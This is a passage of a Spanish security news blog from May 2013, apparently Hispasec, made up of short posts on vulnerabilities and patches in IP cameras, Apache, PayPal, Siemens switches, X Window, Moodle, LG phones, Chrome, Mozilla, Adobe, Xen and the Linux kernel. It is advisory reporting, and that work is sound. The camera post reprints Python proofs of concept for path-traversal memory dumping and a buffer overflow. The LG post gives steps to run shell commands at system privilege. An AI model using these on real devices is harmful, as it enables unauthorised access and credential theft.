viernes, 31 de mayo de 2013

Múltiples vulnerabilidades en diferentes cámaras IP (TP-Link, MayGion y Zavio)

Nahuel Riva y Francisco Falcon de Core Exploit han descubierto y publicado múltiples vulnerabilidades en cámaras IP de los fabricantes TP-Link, MayGion y Zavio. También han desarrollado diversas pruebas de concepto para demostrar estos fallos de seguridad.

Las vulnerabilidades que afectan a las cámaras IP TP-Link son:

  • CVE-2013-2572: un atacante remoto podría utilizar los credenciales fijados en el fichero de configuración 'boa.conf' para acceder a la interfaz web de administración.
        
  • CVE-2013-2573: un error de falta de filtrado de parámetros de entrada en '/cgi-bin/mft/wireless_mft.cgi' podría permitir la inyección de comandos de forma remota.

Como prueba de concepto, se inyecta un comando en la siguiente URL para alojar una copia del fichero que almacena los credenciales de los usuarios en el directorio raíz del servidor web, aprovechando la vulnerabilidad CVE-2013-2573:

TP-Link TL-SC 3130G

quedando accesible desde la URL: http://DIRECCIÓN_IP/credenciales

Se ven afectados los dispositivos con firmware v1.6.18P12, y se han comprobado los modelos:

  • TL-SC 3130 (solo la vulnerabilidad CVE-2013-2572 afecta a este dispositivo)
  • TL-SC 3130G
  • TL-SC 3171G
  • TL-SC 4171G

TP-Link ha publicado una actualización de firmware que corrige los errores en su página web.

Por su parte las cámaras IP del fabricante MayGion presentan otras dos vulnerabilidades:

  • CVE-2013-1604: un atacante remoto no autenticado podría aprovechar un problema de ruta transversal para realizar un volcado de la memoria del dispositivo y obtener credenciales válidas de usuario.
        
  • CVE-2013-1605: un fallo de desbordamiento de memoria podría permitir la ejecución de código arbitrario de forma remota.

Los investigadores han publicado dos sencillas PoC escritas en python para probar estos dos fallos:

  • Para obtener un volcado de la memoria del dispositivo (CVE-2013-1604).

       import httplib
       conn = httplib.HTTPConnection("DIRECCIÓN_IP")
       conn.request("GET", "/../../../../../../../../../proc/kcore")
       resp = conn.getresponse()
       data = resp.read()
       conn.close()

  • Para causar un desbordamiento de memoria y conseguir que el registro 'Instruction Pointer' sea sobrescrito con el valor 0x61616161 (CVE-2013-1605).

       import httplib
       conn = httplib.HTTPConnection("DIRECCIÓN_IP")
       conn.request("GET", "/" + "A" * 3000 + ".html")
       resp = conn.getresponse()
       data = resp.read()
       conn.close()

Las vulnerabilidades han sido comprobadas en dispositivos con firmware v09.27 ó 2011.27.09, aunque otras versiones también podrían verse afectadas.

La respuesta del fabricante es que las vulnerabilidades han sido corregidas en el firmware 2013.22.04.

Zavio F3105
Por último, los dispositivos del fabricante Zavio basados en el firmware v1.6.03 se ven afectados por las cuatro vulnerabilidades siguientes:

  • CVE-2013-2567: un atacante remoto podría utilizar los credenciales fijados en el fichero de configuración 'boa.conf' para acceder a la interfaz web de administración.
        
  • CVE-2013-2568: un error de falta de comprobación de parámetros de entrada en '/cgi-bin/mft/wireless_mft.cgi' podría permitir la inyección de comandos de forma remota.
        
  • CVE-2013-2569: un atacante remoto no autenticado podía tener acceso al vídeo en tiempo real.
        
  • CVE-2013-2570: una inyección de comandos en la función 'sub_C8C8' localizada en /opt/cgi/view/param.

La PoC de los dispositivos TP-Link es aplicable a la vulnerabilidad CVE-2013-2568.

Además, con la siguiente URL un atacante remoto no autenticado podía tener acceso al flujo de vídeo en directo (CVE-2013-2569):

rtsp://DIRECCIÓN_IP/video.h264

La última PoC es una inyección de comandos (CVE-2013-2570) a través del parámetro General.Time.NTP.Server que permite obtener una lista completa de puntos de acceso ejecutando el comando '/sbin/awpriv ra0 get_site_survey':


El fabricante Zavio no se ha pronunciado al respecto de las vulnerabilidades que afectan a sus dispositivos.

Más información:

TP-Link IP Cameras Multiple Vulnerabilities

MayGion IP Cameras multiple vulnerabilities

Zavio IP Cameras multiple vulnerabilities

  


Juan José Ruiz

jueves, 30 de mayo de 2013

Ejecución de comandos en Apache Web Server

Apache ha corregido un fallo de seguridad que podría permitir a un atacante ejecutar comandos si los inyecta previamente en los logs (lo que se consigue simplemente realizando peticiones HTTP especialmente manipuladas).

El fallo se encuentra en el módulo mod_rewrite del servidor web Apache, que no filtra ciertos caracteres y por tanto podría permitir la ejecución de código arbitrario de forma remota si un atacante deja comandos en los logs y luego son interpretados en consola.

mod_rewrite es un módulo del servidor web Apache que permite reescribir las URL solicitadas sobre la marcha basándose en reglas. Dichas reglas de reescritura pueden ser invocadas desde los ficheros 'httpd.conf' de forma global o '.htaccess' en cada directorio. mod_rewrite es ampliamente utilizado para crear direcciones URL alternativas para las páginas dinámicas de forma que resulten más legibles, fáciles de recordar por los usuarios, y también mejor indexadas por los motores de búsqueda o buscadores.

Joe Orton ha descubierto que la función 'do_rewritelog', localizada en el fichero 'modules/mappers/mod_rewrite.c', no filtra adecuadamente los caracteres no imprimibles cuando escribe los datos en el archivo de registro (logs). Si se usa la directiva RewriteLog, un atacante remoto podría aprovechar este fallo para ejecutar comandos arbitrarios a través de peticiones HTTP especialmente manipuladas. Por ejemplo, que contengan una secuencia de escape para un terminal si los archivos de logs son mostrados.


La vulnerabilidad, identificada como CVE-2013-1862, afecta a la versión del servidor Apache 2.2.24, aunque también podrían estar comprometidas versiones anteriores. En la versión 2.2.25 ha sido corregida.

Más información:

APACHE 2.2 STATUS

mod_rewrite-CVE-2013-1862.patch



Juan José Ruiz


miércoles, 29 de mayo de 2013

Paypal no paga por un fallo de seguridad descubierto por un chico de 17 años

Robert Kugler, un alemán de 17 años, ha descubierto un grave fallo de seguridad en Paypal. La empresa, lejos de recompensar al estudiante a través de su programa oficial de caza de bugs, le "descalificó" después de haber reportado el fallo, que finalmente ha hecho público. No es el primer desliz de Paypal con respecto a los investigadores.

Robert Kugler ha descubierto un clásico problema de Cross Site Scripting en el buscador de Paypal. En una web de esta categoría, un XSS puede resultar extremadamente serio, puesto que permitiría a atacantes engañar a los usuarios de una manera mucho más sofisticada.
Kugler quiso acogerse al programa de recompensas de Paypal, que anima a la investigación responsable de vulnerabilidades premiando económicamente a los usuarios que encuentren fallos de seguridad. Así motivan un uso responsable de las vulnerabilidades. Mozilla, Google y otros agentes externos que funcionan como intermediarios, actúan de esta forma con éxito desde que se pusiera de moda hace unos años.

Kluger recibió sin embargo un email afirmando que su descubrimiento no optaba al premio por tener 17 años. Finalmente ha publicado el problema en Full Disclosure, quejándose de la situación. Kluger afirma que la respuesta de Paypal fue:

"To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age. If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments."

Pero parece que esto le fue comunicado en privado, puesto que públicamente no se pueden encontrar fácilmente esas restricciones en ninguna página oficial de Paypal ni parece que nunca se haya impuesto públicamente esta restricción.

El investigador en desventaja

Poner restricciones a la entregas de premios después de haber recibido la información es una práctica que, cuando menos, coloca al investigador en desventaja. No conoce las reglas del juego completas hasta que ha enseñado sus cartas (el código vulnerable) a la compañía. Esta, que ya puede arreglar el fallo (en última instancia, es lo que les interesa), decide entonces que los menores de edad no pueden recibir un premio.

Si se tratase de una cuestión legal, existen innumerables formas de sortear el inconveniente, como pedir permiso a sus tutores legales o compensar de otras formas. Pero la realidad es que se ha rechazado a la persona que encuentra un fallo que perfectamente encaja en la dinámica y reglas propuestas por Paypal, por una cuestión "menor" como es la edad... y esto deja en clara desventaja al usuario y da muy mala imagen a Paypal, que no es la primera vez que se ve criticada por otros aspirantes a la recompensa. Se han conocido otros problemas sufridos por investigadores para que la compañía realmente les pague por sus vulnerabilidades.

Otras empresas como Mozilla, llegaron a pagar 3.000 dólares a un chico de 12 años por encontrar un grave fallo de seguridad en el navegador. Cim Stordal, de 15 años, ha descubierto ya fallos en Facebook, Chrome... y en la mayoría de los programas ha sido aceptado y recompensado.

El investigador de seguridad informática es habitualmente joven, y la experiencia demuestra que suele elucubrar sus mejores ideas o potenciar sus habilidades durante su adolescencia. Imponer una restricción de edad como si la "inmadurez legal" fuese un obstáculo técnico en el mundo de la seguridad, no puede más que interpretarse como una excusa por parte de la compañía y una puesta en evidencia de un programa de recompensas que, si bien ha resultado una buena idea en general para todas las empresas que lo han puesto en marcha, Paypal en concreto parece gestionar de forma discutible. O al menos, no parece que le esté otorgando el rédito en buena imagen que, como efecto colateral, también se busca con estas iniciativas.

Más información:

La caza de bugs en Paypal acaba con la publicación de un grave agujero de seguridad

PayPal.com XSS Vulnerability

Boy bug hunter nabs $3,000 from Mozilla

Teen finds bugs in Google, Facebook, Apple, Microsoft code



Sergio de los Santos
Twitter: @ssantosv

martes, 28 de mayo de 2013

Salto de restricciones en switches Siemens Scalance X-200 IRT

Dos vulnerabilidades en el firmware de los switches Siemens Scalance de la serie X-200 IRT (usados en entornos SCADA) podrían permitir eludir restricciones de seguridad de forma remota.

Siemen Scalance X-200-4P IRT
Los switches Siemens Scalance de la familia X-200 IRT son utilizados en redes industriales para conectar componentes tales como PLCs y HMIs. Además la serie IRT (Isochronous Real-Time) es recomendada para satisfacer las exigencias en cuanto al tiempo real. Disponen de una interfaz web de administración para facilitar su gestión y cuentan con funciones de diagnóstico remoto estándar (SNMP).

Siemens ha publicado un boletín de seguridad que corrige dos vulnerabilidades en los switches Scalance. La primera de ellas se debe a un error de falta de comprobación de privilegios de usuario de la interfaz web en el lado del servidor. Esto podría ser aprovechado por un atacante remoto autenticado para elevar sus privilegios y ejecutar comandos. Esta vulnerabilidad ha sido identificada como CVE-2013-3633.

La segunda vulnerabilidad se debe a un fallo en la implementación del protocolo SNMPv3 al no validar los credenciales del usuario correctamente, lo que podría permitir a un atacante remoto ejecutar comandos SNMP sin estar autenticado. El identificador de esta vulnerabilidad es CVE-2013-3634.

Se encuentran afectados los siguientes switches:
  • Scalance X-200-4P IRT
  • Scalance X-201-3P IRT
  • Scalance X-201-3P IRT PRO
  • Scalance X-202-2IRT
  • Scalance X-202-2P IRT
  • Scalance X-202-2P IRT PRO
  • Scalance X-204IRT
  • Scalance X-204IRT PRO
  • Scalance XF-204IRT


Siemens ha publicado una actualización de firmware, la versión 5.1.0, que corrige ambos errores. Está disponible para su descarga en la página oficial.
  
Más información:

SSA-170686: Vulnerabilities in Siemens Scalance X200 IRT Switch family

Siemens Industry Online Support


Juan José Ruiz

lunes, 27 de mayo de 2013

Actualización de seguridad para X Window corrige 29 vulnerabilidades


Ilja van Sprundel, un investigador de seguridad de IOActive ha descubierto varios problemas de seguridad en las librerías del cliente X de X Window, un total de 29 vulnerabilidades en 22 librerías.

X Window es un software que se utiliza para dotar de una interfaz gráfica a los sistemas Unix. X Window contiene una parte servidor (X Server) encargada de acceder a los recursos de hardware (pantalla, teclado, etc..) y una parte de cliente (X client) que se encarga de interactuar con el usuario.

Los errores son producidos por una "confianza" de los valores que deben de ser retornados por el servidor en la comunicación entre el cliente y servidor X. Se han visto afectadas 22 librerías (de tres proyectos diferentes) que son las siguientes:  libX11, libXcursor, libXext, libXfixes, libXi, libXinerama, libXp, libXrandr, libXrender, libXRes, libXtst, libXv, libXvMC, libXxf86dga, libXxf86vm, libdmx, libxcb, libFS, libXt del proyecto X.Org, las librerías libchromeXvMC y libchromeXvMCPro del proyecto openChrome y la librería libGLX del proyecto Mesa.

Las vulnerabilidades han sido identificadas desde el CVE-2013-1981 hasta el CVE-2013-2005 y desde el CVE-2013-2062 hasta CVE-2013-2066. Algunos detalles de las vulnerabilidades son:

  • 17 desbordamientos de entero causados por un error al calcular la memoria necesaria para almacenar el valor retornado por una función. Afecta a total de 17 librerías, todas exceptuando las librerías 'libXcursor', 'libXxf86vm', 'libFS', 'libXt', 'libXt', afectando a un total de 54 funciones.
        
  • Un error de signo causado por un fallo al calcular la memoria necesaria para almacenar el valor retornado por una función. Se ven afectadas las librerías 'libXi' y 'libFS' en una función cada librería.
        
  • 7 desbordamientos de memoria intermedia causados por una falta de validación de la cantidad de memoria necesaria para almacenar el valor retornado por una función. Afecta a la librerías 'libX11', 'libXi', 'libXv', 'libXvMC', 'libXxf86dga', 'libXxf86vm' y 'libXt' afectando a un total de 24 funciones.
         
  • Dos desbordamiento de enteros causados por una falta de comprobación de la cantidad de memoria necesaria para procesar los ficheros especificados por un usuario. Afecta a las librerías 'libX11' y 'libXcursor' en 6 funciones.
        
  • Un error por una falta de límites en la recursión en el procesamiento de los ficheros especificados por un usuario. Afecta a la librería 'libX11' en dos funciones.
         
  • Una corrupción de memoria causada por una falta de validación de la cantidad de memoria necesaria para almacenar el valor retornado por una función. Afecta a la librería 'libXt' en un total de cinco funciones.


Las vulnerabilidades ya han sido corregidas en las librerías correspondientes y pueden ser descargadas desde los repositorios oficiales.

Más información:

X.Org Security Advisory: May 23, 2013

Openchrome

The Mesa 3D Graphics Library




Jose Ignacio Palacios Ortega

domingo, 26 de mayo de 2013

Múltiples vulnerabilidades en Moodle


Moodle ha publicado varios boletines de seguridad en los que corrigen un total de cinco vulnerabilidades. Se ven afectadas las versiones 2.2.9, 2.4.3 y 2.3.6 y anteriores.

Moodle, acrónimo de Modular Object-Oriented Dynamic Learning Environment (en español, Entorno de Aprendizaje Dinámico, Orientado a Objetos y Modular). Es una plataforma educativa de código abierto escrita en PHP, que permite a los educadores crear y gestionar tanto usuarios como cursos de modalidad e-learning. Además proporciona herramientas para la comunicación entre formadores y alumnos.

Los boletines de seguridad van desde MSA-13-0020 hasta el MSA-13-0024 y las vulnerabilidades que corrigen son las identificadas como CVE-2013-1835, CVE-2013-1836, CVE-2013-2079, CVE-2013-2080 y CVE-2013-2081. A grandes rasgos, son las siguientes:

  • Un error al no limpiar correctamente los elementos de un formulario.
        
  • Una falta de validación de los comentarios que podría permitir que los usuarios puedan ver un comentario no permitido.
        
  • Un error al manejar los sitios de información registrados podría permitir que la información sea enviada a un sitio aunque no esté marcada.
        
  • Un error en el método 'showtotalsifcontainhidden' en el generador de calificaciones podría ser aprovechado para mostrar valores incorrectos.
         
  • Un error al controlar las descargar de ficheros 'zip' podría permitir a un usuario descargar ficheros enviados por otros usuarios.


Los errores han sido corregidos en las versiones 2.5, 2.4.4, 2.3.7 y 2.2.10 y pueden ser descargadas desde su página oficial

Más información

Moodle security news

Official Moodle git projects

  

Jose Ignacio Palacios Ortega

sábado, 25 de mayo de 2013

Elevación de privilegios en teléfonos LG Optimus G

Se ha descubierto una vulnerabilidad en el software de algunos smartphones de LG que podría permitir la ejecución de comandos con privilegios de system en el teléfono.

La vulnerabilidad se ha encontrado en un teléfono LG Optimus G E973 con sistema operativo Android 4.1.2. El fallo se debe a un error al procesar la configuración del teléfono en el menú oculto del software de LG.

Se ha publicado una prueba de concepto para aprovechar la vulnerabilidad, son los siguientes pasos:

  • Se puede desplegar el menú oculto de LG marcando en el teléfono el número "3845#*XXX#", siendo XXX el modelo del teléfono LG.
         
  • Se debe seleccionar la opción "WLAN test" del menú, después la opción "Wi-Fi Ping Test/User Command", y a continuación seleccionar la opción "User Command".
         
  • A continuación se puede borrar el comando que aparece (tcpdump) y luego escribir el comando shell que se desea ejecutar en el teléfono y presionar "CANCEL" para cancelar el comando, lo que por error en el software ejecutará el comando introducido.

Puesto que la aplicación tiene los mayores privilegios, se pueden realizar diferentes acciones inicialmente restringidas sobre el teléfono. A la vulnerabilidad se le ha asignado el identificador CVE-2013-3666 y ha sido probado en un LG modelo 973, con un video en Youtube mostrando la vulnerabilidad.

La vulnerabilidad no se puede reproducir en todos los LG disponibles pero otras versiones diferentes a la comprobada en el vídeo pueden ser también vulnerables.

Más información

Full Disclosure


Jose Ignacio Palacios Ortega


viernes, 24 de mayo de 2013

IDA Pro corrige cuatro vulnerabilidades


Hex-Rays, compañía responsable de IDA, ha publicado una noticia en la anuncia varios agujeros de seguridad en IDA Pro 6 y proporciona un parche para solucionarlos.

IDA es un software de depurado y desensamblado que permite al análisis de binarios. Proporciona una vista gráfica del flujo de funciones del programa y se utiliza habitualmente para análisis de malware e ingeniería inversa (cracking, por ejemplo).

No se ha dado información clara sobre el impacto que podría llegar a suponer estos problemas  en un sistema afectado, aunque parece que podrían llegar a la ejecución de código.

Los errores son los siguientes. 
  • Un error en el módulo de depuración 'WinDbg' que permitiría lanzar el depurador con un fichero arbitrario.
         
  • Un error en las funciones 'qrealloc' y 'qrealloc_or_throw'.
         
  • Un error el módulo 'idapython' que  permitiría ejecutar un script que se encuentre en el mismo directorio del fichero de entrada.
        
  • Un error en el motor de base de datos 'btree' explotable a través de una base de datos especialmente manipulada.
     

Los errores fueron reportados a la compañía en 2011 y 2012 y han sido corregidos en con un parche para las versiones 6.1 y 6.2, disponible para su descarga en el apartado de más información.

Más información:

Cumulative bugfix for IDA



Jose Ignacio Palacios Ortega

jueves, 23 de mayo de 2013

Actualización de seguridad para QuickTime


Apple ha publicado una nueva versión de QuickTime (la 7.7.4), que solventa 12 problemas de seguridad en su versión para Windows.

Quick Time es un software desarrollado por Apple que permite la visualización de varios formatos de imágenes y la reproducción de múltiples formatos de audio y vídeo.

Las vulnerabilidades han sido catalogadas desde el CVE-2013-1015 hasta el CVE-2013-1022 y desde el CVE-2013-0986 hasta el CVE-2013-0989 (todos incluidos) que podrían permitir la ejecución de código en el equipo afectado y son las que se detallan a continuación.

En el procesamiento de los metadatos ha corregido un desbordamiento al procesar el metadato 'mvhd' y otros dos desbordamientos al procesar los metadatos 'dref' y 'enof'.

En el procesamiento de imágenes se ha corregido una corrupción de memoria y un desbordamiento de memoria al procesar los ficheros JPEG, una corrupción de memoria en el procesamiento de los ficheros QTIF, y un desbordamiento de memoria al procesar los ficheros FPX.

En el procesamiento de vídeos se han corregido tres desbordamientos, uno en los vídeos con codificación Sorenson, otro en la codificación H.264 y otro en la codificación H.263

También se ha corregido un último desbordamiento en el manejo de los ficheros MP3, y una corrupción de memoria al procesar los ficheros TeXML.

Esta nueva versión puede instalarse a través de las funcionalidades de actualización automática (Software Update) de Apple, o descargándolas directamente desde http://www.apple.com/quicktime/download/

Más información:

About the security content of QuickTime 7.7.4


Jose Ignacio Palacios Ortega
jipalacios@hispasec.com

miércoles, 22 de mayo de 2013

Nueva versión de Google Chrome corrige 14 vulnerabilidades

Google ha publicado una nueva versión de su navegador Chrome con la versión 27.0.1453.93, para todas las plataformas (Windows, Mac, Linux y Chrome Frame), que además de incluir nuevas funcionalidades y mejoras corrige 14 nuevas vulnerabilidades, 11 de ellas con un nivel de gravedad alto.

Según el aviso de Google, las páginas se cargan ahora un 5% más rápido de media, se ha incluido la API chrome.syncFileSystem y se han mejorado la clasificación de predicciones y la corrección gramatical, así como mejoras fundamentales para las predicciones Omnibox.

Las vulnerabilidades de gravedad alta residen en el uso de punteros después de ser liberados en SVG (CVE-2013-2837), en el cargador de medios (CVE-2013-2840 y CVE-2013-2846), en el tratamiento de recursos Pepper (CVE-2013-2841), en el tratamiento de widgets (CVE-2013-2842), en el tratamiento de voz (CVE-2013-2843), en resolución de estilos (CVE-2013-2844), en workers (CVE-2013-2847), problemas de seguridad en memoria en Web Audio (CVE-2013-2845), en el manejo del portapapeles (CVE-2013-2839) y otros fallos que pueden permitir la explotación (CVE-2013-2836).

De nivel medio una lectura fuera de límites en v8 (CVE-2013-2838), y una posible extracción de datos con XSS Auditor (CVE-2013-2848). Por último, de gravedad baja un posible cross site scripting al arrastrar y soltar o al copiar y pegar (CVE-2013-2849).

Google recuerda que parte de las vulnerabilidades solucionadas fueron detectadas a través de su proyecto público de detección de errores en memoria para aplicaciones escritas en C/C++: AddressSanitizer.

Esta nueva versión, también incluye una versión actualizada de Adobe Flash 11.7.

Esta actualización está disponible a través de Chrome Update automáticamente en los equipos así configurados. Según la política de la compañía estas vulnerabilidades han supuesto un total de 14.633,7 dólares en recompensas a los descubridores de los problemas.

Más información:

Stable Channel Update

  

Antonio Ropero
Twitter: @aropero

martes, 21 de mayo de 2013

Publicada la sexta conferencia TASSI "Del disco flexible a la nube: pasado, presente y futuro de la informática forense"

Se encuentra disponible en el canal YouTube de la Universidad Politécnica de Madrid la sexta conferencia del IX Ciclo UPM TASSI 2013 con el título "Del disco flexible a la nube: pasado, presente y futuro de la informática forense", impartida en el Campus Sur de la UPM el 8 de mayo de 2013 por D. Javier Pagès, Director de Informática Forense S.L.



En la sección Conferencias TASSI del servidor web de Criptored encontrará la presentación en pdf utilizada por el ponente, así como todas las conferencias de este noveno y anteriores ciclos UPM TASSI.
  

Jorge Ramió

lunes, 20 de mayo de 2013

Wireshark corrige nueve vulnerabilidades


Se ha publicado nueve boletines de seguridad para Wireshark que alertan y corrigen otras tantas vulnerabilidades para este software.

Wireshark es una aplicación de auditoría orientada al análisis de tráfico en redes. Su popularidad es muy elevada, puesto que soporta una gran cantidad de protocolos y es de fácil manejo. Además Wireshark es software libre (sujeto a licencia GPL) y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, así como en Microsoft Windows.

Las nueve vulnerabilidades corregidas pueden ser aprovechadas para hacer que el software sufra una denegación de servicio, bien dejando de funcionar, bien consumiendo todos los recursos de la máquina.

En escenarios en los que se estén monitorizando ataques de red con Wireshark, estos fallos pueden permitir al potencial atacante neutralizar al software antes de lanzar el ataque real y así pasar desapercibido.

Como es habitual, estos fallos se pueden aprovechar por medio de dos vectores: mediante la inyección de un código especialmente manipulado en la interfaz en la que el software esté analizando el tráfico, o por medio de un fichero de captura de tráfico y que sea procesado por el programa.

Los disectores vulnerables son los siguientes: "GTPv2", "ASN.1 BER", "PPP CCP", "DCP ETSI", "MPEG DSM-CC", "Websocket", "MySQL" y "ETCH" en las versiones anteriores a 1.8.7 y 1.6.15.

Más información:

Wireshark Security Advisories



Jose Ignacio Palacios Ortega

domingo, 19 de mayo de 2013

Denegación de servicio y potencial ejecución de código en Xen


Se ha encontrado un fallo de seguridad en Xen que podría permitir a un atacante provocar una denegación de servicio o incluso ejecutar código en la máquina anfitriona.

Xen es un proyecto colaborativo de la fundación Linux centrado en la virtualización de hardware. Las tecnologías creadas son Xen Hypervisor (el estándar de virtualización del mundo del código abierto), Xen Cloud Platform (plataforma de soluciones en la red basada en la tecnología anterior) y Xen ARM, destinada a dispositivos móviles.

El error encontrado consiste en un fallo a la hora de filtrar parámetros en las llamadas a 'xc_vcpu_setaffinity' desde python. Si se asigna afinidad vcpu a máquinas virtuales de cierta forma, el fallo provocado podría ser aprovechado para causar un desbordamiento de buffer y corrupción de memoria.

Un atacante con acceso para configurar los parámetros de CPU en las máquinas virtuales podría explotar esta vulnerabilidad y causar una denegación de servicio, aunque no se descarta del todo la posibilidad de ejecución de código o elevación de privilegios.

Afecta a Xen 4.0 y posteriores, aunque solo a sistemas que usen libxc python bindings, aquellos que no usan python como xl o xapi, no son vulnerables.

Para subsanar el error, se recomienda aplicar el parche adjunto al boletín oficial de Xen.

Más información:

Xen Security Advisory 56 (CVE-2013-2072) - Buffer overflow in
xencontrol Python bindings affecting xend

xsa56.patch




Fernando Castillo

sábado, 18 de mayo de 2013

Publicada la quinta conferencia TASSI Seguridad en sistemas: "explotando vulnerabilidades" D. Alejandro Ramos

Se encuentra disponible en el canal YouTube de la Universidad Politécnica de Madrid la quinta conferencia del IX Ciclo UPM TASSI 2013 con el título "Seguridad en sistemas: explotando vulnerabilidades", impartida en el Campus Sur de esta universidad el 17 de abril de 2013 por D. Alejandro Ramos, Security By Default.



En la sección Conferencias TASSI del servidor web de Criptored encontrarás la presentación en pdf y otros documentos multimedia utilizados por el ponente, así como todas las conferencias de este noveno y anteriores ciclos UPM TASSI.




Jorge Ramió

viernes, 17 de mayo de 2013

Boletines de seguridad de productos Mozilla corrigen 15 vulnerabilidades

La Fundación Mozilla ha publicado ocho boletines de seguridad (tres críticos, cuatro altos, uno moderado) que en total corrigen 15 vulnerabilidades que afectan al navegador Firefox y al gestor de correo Thunderbird. Se detallan a continuación:

  • MFSA 2013-41: Corrige dos vulnerabilidades de corrupción de memoria que podrían permitir la ejecución de código (CVE-2013-0801 y CVE-2013-1669).
       
  • MFSA 2013-42: Corrige una vulnerabilidad en Chrome Object Wrappers (COW) que permitiría ataques cross-site scripting (CVE-2013-1670).
       
  • MFSA 2013-43: Corrige una vulnerabilidad full path disclosure en la entrada HTML (CVE-2013-1671).
        
  • MFSA 2013-44: Corrige una vulnerabilidad en Mozilla Maintenance Service que podría causar elevación de privilegios (CVE-2013-1672).
       
  • MFSA 2013-45: Corrige dos vulnerabilidades en Mozilla Updater que podrían causar elevación de privilegios (CVE-2013-1673 y CVE-2012-1942).
       
  • MFSA 2013-46: Corrige una vulnerabilidad use-after-free que podría permitir ejecutar código arbitrario (CVE-2013-1674).
       
  • MFSA 2013-47: Corrige una vulnerabilidad en funciones DOMSVGZoomEvent que permitiría revelar información sensible (CVE-2013-1675).
       
  • MFSA 2013-48: Corrige seis vulnerabilidades de lectura fuera de límites, escritura no válida y use-after-free que podrían causar ejecución de código arbitrario. Las funciones donde se encuentran los errores son las siguientes: 'SelectionIterator::GetNextSegment', 'gfxSkipCharsIterator::SetOffsets', '_cairo_xlib_surface_add_glyph', 'mozilla::plugins::child::_geturlnotify', 'nsFrameList::FirstChild', 'nsContentUtils::RemoveScriptBlocker'.

Se recomienda actualizar a Firefox 21.0 o Firefox ESR 17.0.6, Thunderbird 17.0.6 o Thunderbird ESR 17.0.6

Más información:

MFSA 2013-48 Memory corruption found using Address Sanitizer

MFSA 2013-47 Uninitialized functions in DOMSVGZoomEvent

MFSA 2013-46 Use-after-free with video and onresize event

MFSA 2013-45 Mozilla Updater fails to update some Windows Registry entries

MFSA 2013-44 Local privilege escalation through Mozilla Maintenance Service

MFSA 2013-43 File input control has access to full path

MFSA 2013-42 Privileged access for content level constructor

MFSA 2013-41 Miscellaneous memory safety hazards (rv:21.0 / rv:17.0.6)



Fernando Castillo

jueves, 16 de mayo de 2013

Boletines de seguridad de Adobe para mayo

Adobe ha publicado tres boletines de seguridad en los que ha corregido un total de 42 vulnerabilidades para los productos ColdFusion, Flash Player , Reader y Acrobat.

Los boletines se detallan a continuación:

  • APSB13-13: Corrige dos vulnerabilidades en Adobe ColdFusion, con CVE-2013-1389 que permite ejecución remota de código. Por otro lado, CVE-2013-3336 permite la descarga de archivos no autorizados a usuarios.
    Afecta a ColdFusion 10, 9.0.2, 9.0.1 y 9.0 para Windows, Macintosh y UNIX.
        
  • APSB13-14: Corrige trece vulnerabilidades en Adobe Flash Player. Todas son corrupciones de memoria que podrían permitir la ejecución remota de código. Afecta a Adobe Flash Player 11.7.700.169 y anteriores para Windows y Macintosh, Adobe Flash Player 11.2.202.280 y anteriores para Linux, Adobe Flash Player 11.1.115.54 y anteriores para Android 4.x, Adobe Flash Player 11.1.111.50 y anteriores para Android 3.x y 2.x, Adobe AIR 3.7.0.1530 y anteriores para Windows y Macintosh, Adobe AIR 3.7.0.1660 anteriores para Android y por último, Adobe AIR 3.7.0.1530 SDK & Compiler y anteriores.
        
  • APSB13-15: Corrige un total de veintisiete vulnerabilidades en Adobe Reader y Acrobat. La mayoría se deben a desbordamiento de memoria intermedia, ya sea en pila o entero. Existen otras de salto de restricciones, use-after-free con elevación de privilegios  y revelación de información sensible a través de Javascript API. Este fallo afecta a Adobe Reader y Acrobat XI (11.0.02) y anteriores para Windows y Macintosh, Adobe Reader y Acrobat X (10.1.6) y anteriores para Windows y Macintosh, Adobe Reader y Acrobat 9.5.4 y anteriores para Windows, Macintosh y Linux.

Se recomienda se actualicen los productos anteriormente mencionados a sus últimas versiones.

Más información:

Adobe Security Bulletins Posted

APSB13-13 - Security update: Hotfix available for ColdFusion

APSB13-14 - Security updates available for Adobe Flash Player

APSB13-15 - Security updates available for Adobe Reader and Acrobat



Fernando Castillo

miércoles, 15 de mayo de 2013

Vulnerabilidad en el kernel Linux permite elevación de privilegios

El pasado mes de abril, un mensaje en la lista del kernel Linux alertaba de un fallo de seguridad en la función 'sw_perf_event_destroy' de kernel/events/core.c. Su autor, Tommi Rantala, comentaba que lo había encontrado ejecutando una versión de Trinity modificada por él mismo. Se trata de una herramienta para emplear técnicas de fuzzing en las llamadas al sistema que proporciona el kernel Linux.

El fallo se encuentra en el subsistema 'perf' que permite obtener métricas de rendimiento del hardware. Al ejecutar un conjunto de llamadas con parámetros aleatorios, Rantala consiguió provocar un "kernel Oops" (una especie de excepción en el kernel). En la salida de registro de Trinity podían observarse las líneas que contenían la sospecha de un problema de seguridad:

[114607.069257] BUG: unable to handle kernel paging request at
0000000383c35328
[114607.070003] IP: [<ffffffff811a7200>] sw_perf_event_destroy+0x30/0x90


Básicamente, antes de la llamada a 'sw_perf_event_destroy' existe una llamada a 'perf_swevent_init', donde se inicializa un entero con signo al valor de event->attr.config, procedente del puntero a la estructura *event:

static int perf_swevent_init(struct perf_event *event)
{
    int event_id = event->attr.config;

    if (event->attr.type != PERF_TYPE_SOFTWARE)
        return -ENOENT;

Posteriormente, se hace una llamada a 'sw_perf_event_destroy' y aquí ese valor entero con signo es tratado como un entero sin signo de 64 bits:

static void sw_perf_event_destroy(struct perf_event *event)
{
        u64 event_id = event->attr.config;

        WARN_ON(event->parent);

        static_key_slow_dec(&perf_swevent_enabled[event_id]);
        swevent_hlist_put(event);
}

Como en 'perf_swevent_init' el entero es tratado con signo, solo es comprobado en su límite superior, dejando abierta la posibilidad de que se introduzca un entero negativo que posteriormente en 'sw_perf_event_destroy', al ser "convertido" en u64, nos dará un entero positivo.

Debido a que el valor de event->attr.config es controlable por el usuario, cuando se efectua la llamada al sistema correspondiente mediante la estructura 'perf_event_attr', es posible mapear una zona de memoria y obtener el control de la misma haciendo que se apunte a esa dirección. Si se llega a ejecutar nuestra zona de memoria con un shellcode instalado allí, este se ejecutaría con permisos de root.

Petr Matousek da una explicación completa y de recomendable estudio en la lista de bugzilla de Red Hat.

El parche fue añadido al repositorio del kernel el mismo mes. Básicamente consiste en promover la variable 'event_id' al tipo 'u64', evitando así la falta de una comprobación apropiada:

static int perf_swevent_init(struct perf_event *event)
 {
-   int event_id = event->attr.config;
